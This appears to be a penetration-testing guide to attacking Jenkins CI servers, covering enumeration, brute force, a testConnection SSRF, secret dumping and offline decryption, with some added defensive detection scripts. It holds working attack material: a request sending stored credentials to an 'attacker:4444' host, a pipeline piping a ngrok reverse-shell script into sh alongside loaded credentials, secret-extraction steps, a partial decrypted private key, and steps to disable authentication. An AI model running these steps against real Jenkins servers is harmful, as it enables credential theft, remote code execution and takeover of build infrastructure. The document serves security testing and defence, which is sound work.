Jenkins Security


Basic Information

Jenkins is a tool that offers a straightforward way to set up a continuous integration or continuous delivery (CI/CD) environment for almost any combination of programming languages and source code repositories using pipelines. In addition, it automates a variety of routine development tasks. While Jenkins does not remove the need to write scripts for individual steps, it provides a faster and more robust way to integrate the whole chain of build, test and deployment tools than one could easily build by hand.

Basic Jenkins Information

Unauthenticated Enumeration

To search for interesting Jenkins pages that are reachable without authentication (such as /people or /asynchPeople, which list the current users) you can use:

msf> use auxiliary/scanner/http/jenkins_enum

Check whether you can execute commands without needing authentication:

msf> use auxiliary/scanner/http/jenkins_command

Without credentials you can look inside the /asynchPeople/ path or /securityRealm/user/admin/search/index?q= for usernames.

You can obtain the Jenkins version from the /oops or /error paths.

Known Vulnerabilities

GitHub - gquere/pwn_jenkins: Notes about attacking Jenkins servers

Login

In the basic information you can check all the ways to log in to Jenkins:

Basic Jenkins Information

Register

You will be able to find Jenkins instances that allow you to create an account and log in. As simple as that.

SSO Login

Also, if SSO functionality/plugins are present, you should try logging in to the application with a test account (i.e. a test GitHub/Bitbucket account). Trick from here.

Bruteforce

Jenkins has no password policy and no brute-force mitigation for usernames. It is essential to brute-force users, because weak passwords or usernames used as passwords may be in place, even reversed usernames as passwords.

msf> use auxiliary/scanner/http/jenkins_login

Password spraying

Use this python script or this powershell script.

IP Whitelisting Bypass

Many organizations integrate SaaS-based source control management (SCM) systems such as GitHub or GitLab with an internal, self-hosted CI solution such as Jenkins or TeamCity. This setup lets the CI systems receive webhook events from the SaaS source control vendors, mainly to trigger pipeline jobs.

Check: https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/

Internal Jenkins Abuses

In these scenarios we will assume you have a valid account to access Jenkins.

Warning

Depending on the Authorization mechanism configured in Jenkins and the permissions of the compromised user, you may or may not be able to perform the following attacks.

For more information check the basic information:

Basic Jenkins Information

Listing users

If you have access to Jenkins you can list other registered users at http://127.0.0.1:8080/asynchPeople/

Dumping builds to find cleartext secrets

Use this script to dump build console outputs and build environment variables in order to find cleartext secrets.

python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v

FormValidation/TestConnection endpoints (CSRF to SSRF/credential theft)

Some plugins expose Jelly validateButton or test-connection handlers under paths such as /descriptorByName/<Class>/testConnection. When those handlers do not enforce POST or permission checks, you can:

  • Turn the POST into a GET and drop the Crumb to bypass the CSRF check.
  • Run the handler as a low-privilege/anonymous user if there is no Jenkins.ADMINISTER check.
  • CSRF an admin and change the host/URL parameter to exfiltrate credentials or trigger outbound calls.
  • Use response errors (e.g. ConnectException) as an SSRF/port-scan oracle.

Example GET (no Crumb) turning a validation call into SSRF/credential exfiltration:

GET /descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection?endPointUrl=http://attacker:4444/&credentialId=openstack HTTP/1.1
Host: jenkins.local:8080

If the plugin reuses stored creds, Jenkins will attempt to authenticate to attacker:4444 and may leak identifiers or errors in the response. See: https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/
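On the detection side, the following Python snippet is an added example (not from the original page or from any Jenkins plugin) that flags validation-endpoint calls in an access log which arrive as GET, from an anonymous caller, or with a caller-supplied target/credential parameter. It assumes NCSA combined-style log lines whose third field carries the authenticated user ('-' for anonymous); the sample lines are constructed.

```python
# Added example (not from the original page): flag form-validation / test-connection
# calls that reach Jenkins as GET or from an anonymous user. Assumes NCSA
# combined-style access log lines (e.g. from a reverse proxy in front of Jenkins)
# whose third field is the authenticated user. SAMPLE_LOG is constructed.
import re
from typing import Iterable, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# /descriptorByName/<FQCN>/testConnection, validate..., check... (Jelly validateButton / doCheck* handlers)
VALIDATION_RE = re.compile(
    r'^/descriptorByName/[^/?]+/(testConnection|validate\w*|check\w*)(\?|$)'
)
# Query parameters a caller could use to redirect the outbound call or pick stored credentials
TARGET_PARAMS = ("url", "endpoint", "host", "server", "credentialid")

def classify(line: str) -> Optional[dict]:
    """None for non-validation requests, else a record listing why the call is risky."""
    m = LOG_RE.match(line)
    if not m or not VALIDATION_RE.match(m["path"]):
        return None
    path, _, query = m["path"].partition("?")
    reasons = []
    if m["method"] != "POST":
        reasons.append("non-POST request: no CSRF crumb required")
    if m["user"] == "-":
        reasons.append("anonymous caller: no permission check enforced")
    if any(p in query.lower() for p in TARGET_PARAMS):
        reasons.append("target/credential parameter supplied by the caller")
    return {"ip": m["ip"], "user": m["user"], "path": path, "reasons": reasons}

def suspicious(lines: Iterable[str]) -> List[dict]:
    """Only validation calls that carry at least one risk reason."""
    return [c for c in map(classify, lines) if c and c["reasons"]]

SAMPLE_LOG = [  # constructed; 203.0.113.7 is a TEST-NET address
    '10.0.0.5 - alice [12/Mar/2024:10:01:02 +0000] "POST /descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /descriptorByName/jenkins.plugins.openstack.compute.JCloudsCloud/testConnection?endPointUrl=http://203.0.113.7:4444/&credentialId=openstack HTTP/1.1" 200 88',
    '10.0.0.5 - alice [12/Mar/2024:10:02:00 +0000] "GET /job/build/42/console HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['user']} {hit['path']}: " + "; ".join(hit["reasons"]))
```

A POST from an authenticated user with no target parameter produces no finding, so legitimate "Test Connection" clicks from the configuration UI are not reported.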

Stealing SSH Credentials

If the compromised user has enough privileges to create/edit a new Jenkins node and SSH credentials are already stored for accessing other nodes, they could steal those credentials by creating/editing a node and setting a host that will record the credentials without verifying the host key.

You will usually find the Jenkins SSH credentials in the global provider (/credentials/), so you can also dump them as you would any other secret. More information in the Dumping secrets section.

RCE in Jenkins

Getting a shell in the Jenkins server gives the attacker the opportunity to leak all the secrets and env variables and to exploit other machines located in the same network, or even to gather cloud credentials.

By default, Jenkins will run as SYSTEM. So, compromising it will give the attacker SYSTEM privileges.

RCE Creating/Modifying a project

Creating/Modifying a project is a way to obtain RCE over the Jenkins server:

Jenkins RCE Creating/Modifying Project

RCE Execute Groovy script

You can also get RCE by executing a Groovy script, which can be stealthier than creating a new project:

Jenkins RCE with Groovy Script

RCE Creating/Modifying Pipeline

You can also get RCE by creating/modifying a pipeline:

Jenkins RCE Creating/Modifying Pipeline

Pipeline Exploitation

To exploit pipelines you still need to have access to Jenkins.

Build Pipelines

Pipelines can also be used as the build mechanism in projects; in that case a file inside the repository can be configured that will contain the pipeline syntax. By default /Jenkinsfile is used:

It is also possible to store pipeline configuration files in other places (in other repositories, for example) with the goal of separating repository access from pipeline access.

If an attacker has write access over that file, they will be able to modify it and trigger the pipeline without even having access to Jenkins.
The attacker might need to bypass some branch protections (depending on the platform and the user's privileges, these may or may not be bypassable).

The most common triggers to execute a custom pipeline are:

  • Pull request to the main branch (or potentially to other branches)
  • Push to the main branch (or potentially to other branches)
  • Update the main branch and wait until it’s executed somehow

Note

If you are an external user you shouldn't expect to be able to create a PR to the main branch of another user's/organization's repo and trigger the pipeline… but if it's badly configured you could fully compromise companies just by exploiting this.

Pipeline RCE

In the previous RCE section a technique to get RCE by modifying a pipeline was already indicated.

Checking Env variables

It is possible to declare cleartext env variables for the whole pipeline or for specific stages. These env variables shouldn't contain sensitive info, but an attacker can always check all the pipeline configurations/Jenkinsfiles:

pipeline {
    agent {label 'built-in'}
    environment {
        GENERIC_ENV_VAR = "Test pipeline ENV variables."
    }

    stages {
        stage("Build") {
            environment {
                STAGE_ENV_VAR = "Test stage ENV variables."
            }
            steps {
                sh 'env' // print the declared variables
            }
        }
    }
}
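As an added example (not from the original page), the Python check below parses a Jenkinsfile's environment blocks and reports variables whose name suggests a secret but whose value is a cleartext literal, leaving credentials('id') bindings alone; the sample Jenkinsfile and the list of secret-like names are assumptions of this example.

```python
# Added example (not from the original page): report Jenkinsfile environment variables whose
# name suggests a secret but whose value is a cleartext literal. Only `NAME = "literal"` lines
# inside declarative environment { } blocks are parsed; credentials('id') bindings are skipped.
import re
from typing import List, Tuple

ENV_OPEN_RE = re.compile(r'^\s*environment\s*\{(.*)$')
ASSIGN_RE = re.compile(r'^\s*([A-Z][A-Z0-9_]*)\s*=\s*(.+?)\s*$')
LITERAL_RE = re.compile(r"""^(['"])(.*)\1$""")
# Assumed name list; extend it with whatever your own naming conventions use.
SECRET_NAME_RE = re.compile(r'PASS|PWD|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY|CREDENTIAL', re.I)

def env_literals(jenkinsfile: str) -> List[Tuple[str, str]]:
    """(name, value) for every string literal assigned inside an environment block."""
    found, in_env, depth = [], False, 0
    for raw in jenkinsfile.splitlines():
        line = raw.split("//", 1)[0]  # drop line comments (naive: also cuts '//' inside values)
        if not in_env:
            m = ENV_OPEN_RE.match(line)
            if not m:
                continue
            in_env, depth, line = True, 1, m.group(1)
        depth += line.count("{") - line.count("}")
        if depth <= 0:  # block closes on this line; keep what precedes the closing brace
            in_env, line = False, line[:line.rfind("}")]
        m = ASSIGN_RE.match(line)
        lit = LITERAL_RE.match(m.group(2)) if m else None
        if lit:
            found.append((m.group(1), lit.group(2)))
    return found

def lint(jenkinsfile: str) -> List[Tuple[str, str]]:
    """Variables a reviewer should look at before the pipeline is merged."""
    return [(name, value) for name, value in env_literals(jenkinsfile) if SECRET_NAME_RE.search(name)]

# Constructed sample: one harmless variable, one cleartext password, one proper binding.
SAMPLE_JENKINSFILE = """\
pipeline {
  agent { label 'built-in' }
  environment {
    GENERIC_ENV_VAR = "Test pipeline ENV variables."
    DB_PASSWORD = "hunter2"             // cleartext secret
    AWS_CREDS = credentials('amazon')   // fine: resolved from the store and masked
  }
  stages { stage("Build") {
    environment { STAGE_ENV_VAR = "Test stage ENV variables." }
    steps { sh 'env' }
  } }
}
"""
```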

Dumping secrets

For information about how secrets are usually handled by Jenkins, check the basic information:

Basic Jenkins Information

Credentials can be scoped to global providers (/credentials/) or to specific projects (/job/<project-name>/configure). Therefore, in order to exfiltrate all of them you need to compromise at least all the projects that hold secrets and run custom/poisoned pipelines.

There is another problem: in order to get a secret inside the env of a pipeline you need to know the name and type of the secret. For example, if you try to load a usernamePassword secret as a string secret, you will get this error:

ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected

Here is a way to load some common secret types:

withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
    sh '''
    env #Search for USERNAME and PASS
    '''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
    sh '''
    env #Search for SECRET
    '''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
    sh '''
    env # Search for USERPASS
    '''
}

// You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
                 string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
    sh '''
    env
    '''
}

At the end of this page you can find all the credential types: https://www.jenkins.io/doc/pipeline/steps/credentials-binding/

Warning

The best way to dump all the secrets at once is by compromising the Jenkins machine (for example by running a reverse shell in the built-in node), then leaking the master keys and the encrypted secrets and decrypting them offline.
More on how to do this in the Nodes & Agents section and in the Post Exploitation section.

Triggers

From the docs: The triggers directive defines the automated ways in which the Pipeline should be re-triggered. For Pipelines which are integrated with a source such as GitHub or BitBucket, triggers may not be necessary as webhook-based integration will likely already be present. The triggers currently available are cron, pollSCM and upstream.

Cron example:

triggers { cron('H */4 * * 1-5') }

Check other examples in the docs.

Nodes & Agents

A Jenkins instance can have different agents running on different machines. From an attacker's perspective, access to different machines means different potential cloud credentials to steal or different network access that could be abused to exploit other machines.

For more information check the basic information:

Basic Jenkins Information

You can list the configured nodes in /computer/; you will usually find the Built-In Node (which is the node running Jenkins) and possibly more.

It is especially interesting to compromise the Built-In node because it contains sensitive Jenkins information.

To indicate that you want to run the pipeline in the built-in Jenkins node you can specify the following configuration inside the pipeline:

pipeline {
    agent {label 'built-in'}

Full example

Pipeline in a specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:

pipeline {
    agent {label 'built-in'}
    triggers { cron('H */4 * * 1-5') }
    environment {
        GENERIC_ENV_VAR = "Test pipeline ENV variables."
    }

    stages {
        stage("Build") {
            environment {
                STAGE_ENV_VAR = "Test stage ENV variables."
            }
            steps {
                withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
                                 string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
                    sh '''
                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
                    '''
                }
            }
        }
    }

    post {
        always {
            cleanWs()
        }
    }
}

Arbitrary File Read to RCE

Jenkins Arbitrary File Read to RCE via "Remember Me"

RCE

Jenkins RCE with Groovy Script

Jenkins RCE Creating/Modifying Project

Jenkins RCE Creating/Modifying Pipeline

Post Exploitation

Metasploit

msf> post/multi/gather/jenkins_gather

Jenkins Secrets

You can list the secrets by accessing /credentials/ if you have enough permissions. Note that this will only list the secrets inside the credentials.xml file, but build configuration files may also contain more credentials.

If you can see the configuration of each project, you can also see there the names of the credentials (secrets) used to access the repository and other credentials of the project.

From Groovy

Jenkins Dumping Secrets from Groovy

From disk

These files are needed to decrypt Jenkins secrets:

  • secrets/master.key
  • secrets/hudson.util.Secret

These secrets can usually be found in:

  • credentials.xml
  • jobs/…/build.xml
  • jobs/…/config.xml

Here is a regex to find them:

# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Print only the filenames where the secrets are located
grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"

# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
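As an added example (not from the original page), the Python script below turns the grep above into an offline audit of a JENKINS_HOME copy: it inventories the encrypted <tag>{...}</tag> values, checks the permissions on secrets/master.key and secrets/hudson.util.Secret, and flags a config.xml with security disabled; the fixture directory it builds is constructed for the example.

```python
# Added example (not from the original page): offline audit of a JENKINS_HOME copy. It lists
# every encrypted {...} secret in the XML files using the regex from above, checks that the key
# material under secrets/ is not group/world readable, and flags <useSecurity>false</useSecurity>.
import os
import re
import stat
import tempfile
from typing import List, Tuple

SECRET_TAG_RE = re.compile(r'^\s*<([a-zA-Z]*)>\{[a-zA-Z0-9=+/]*\}<')  # same pattern as the grep
KEY_FILES = ("secrets/master.key", "secrets/hudson.util.Secret")

def find_encrypted_secrets(home: str) -> List[Tuple[str, int, str]]:
    """(relative file, line number, tag name) for each encrypted value found."""
    hits = []
    for root, _, files in os.walk(home):
        for name in (f for f in files if f.endswith(".xml")):
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    m = SECRET_TAG_RE.match(line)
                    if m:
                        hits.append((os.path.relpath(path, home), lineno, m.group(1)))
    return hits

def audit(home: str) -> List[str]:
    findings = []
    for rel in KEY_FILES:  # anyone who can read both files can decrypt every stored secret
        p = os.path.join(home, rel)
        if os.path.exists(p) and stat.S_IMODE(os.stat(p).st_mode) & 0o077:
            findings.append(f"{rel}: readable by group/others (mode {stat.S_IMODE(os.stat(p).st_mode):o})")
    cfg = os.path.join(home, "config.xml")
    if os.path.exists(cfg) and re.search(r'<useSecurity>\s*false\s*</useSecurity>', open(cfg).read()):
        findings.append("config.xml: security disabled (<useSecurity>false</useSecurity>)")
    for f, n, tag in find_encrypted_secrets(home):
        findings.append(f"{f}:{n}: encrypted <{tag}> value stored here")
    return findings

def make_fixture() -> str:
    """Constructed JENKINS_HOME layout: one over-permissive key file, security off, one secret."""
    home = tempfile.mkdtemp(prefix="jenkins_home_")
    os.makedirs(os.path.join(home, "secrets"))
    for rel, mode in (("secrets/master.key", 0o644), ("secrets/hudson.util.Secret", 0o600)):
        with open(os.path.join(home, rel), "w") as fh:
            fh.write("placeholder-key-material\n")
        os.chmod(os.path.join(home, rel), mode)
    with open(os.path.join(home, "config.xml"), "w") as fh:
        fh.write("<hudson>\n  <useSecurity>false</useSecurity>\n</hudson>\n")
    with open(os.path.join(home, "credentials.xml"), "w") as fh:
        fh.write("<creds>\n  <secret>{AQAAABAAAAAwEXAMPLE+PLACEHOLDER==}</secret>\n</creds>\n")
    return home
```

Run audit() against a copy of the real JENKINS_HOME to get a rotation list for the secrets it reports and to catch key files that other local users can read.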

Decrypt Jenkins secrets offline

If you have dumped the passwords needed to decrypt the secrets, use this script to decrypt those secrets:

python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT

Decrypt Jenkins secrets from Groovy

println(hudson.util.Secret.decrypt("{...}"))

Create a new admin user

  1. Access the Jenkins config.xml file in /var/lib/jenkins/config.xml or C:\Program Files (x86)\Jenkins\
  2. Search for <useSecurity>true</useSecurity> and change true to false.
  3. sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml
  4. Restart the Jenkins server: service jenkins restart
  5. Now go to the Jenkins portal again; Jenkins will not ask for credentials this time. Go to "Manage Jenkins" to set the administrator password again.
  6. Enable security again by changing the setting to <useSecurity>true</useSecurity> and restart Jenkins again.
